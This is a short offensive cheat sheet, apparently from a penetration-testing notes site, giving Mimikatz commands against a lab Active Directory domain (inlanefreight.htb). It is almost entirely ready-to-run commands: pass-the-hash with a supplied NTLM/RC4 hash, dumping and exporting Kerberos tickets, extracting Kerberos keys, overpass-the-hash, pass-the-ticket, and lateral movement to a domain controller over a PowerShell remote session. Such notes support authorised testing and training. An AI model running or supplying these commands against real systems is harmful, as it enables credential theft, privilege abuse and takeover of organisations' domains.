mimikatz.exe

# This will use the Pass the hash technique
mimikatz.exe privilege::debug "sekurlsa::pth /user:julio /rc4:64F12CDDAA88057E06A81B54E73B949B /domain:inlanefreight.htb /run:cmd.exe" exit

Note: To collect all tickets we need to execute Mimikatz or Rubeus as an administrator.

# This will export tickets / dump all tickets 
# The result is a list of files with the extension .kirbi, which contain the tickets.
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit

dir *.kirbi

# This will extract kerberos keys
mimikatz.exe
privilege::debug
sekurlsa::ekeys

Mimikatz requires administrative rights to perform the Pass the Key/OverPass the Hash attacks, while Rubeus doesn't.

# This will Pass the Key or OverPass the Hash
mimikatz.exe
privilege::debug

sekurlsa::pth /domain:inlanefreight.htb /user:plaintext /ntlm:3f74aa8f08f712f09cd5177b5c1ce50f

# This will Pass the Ticket
mimikatz.exe 
privilege::debug

kerberos::ptt "C:\Users\plaintext\Desktop\Mimikatz\[0;6c680]-2-0-40e10000-plaintext@krbtgt-inlanefreight.htb.kirbi"

exit

# Then you can view the directory
dir \\DC01.inlanefreight.htb\c$

# This will Pass the Ticket for Lateral Movement.
mimikatz.exe
privilege::debug

kerberos::ptt "C:\Users\Administrator.WIN01\Desktop\[0;1812a]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"

exit

# Then do this
# Now we have access to dc01
powershell
Enter-PSSession -ComputerName DC01
whoami
hostname

PreviousRubeus.exe NextInvoke-TheHash

Last updated 1 year ago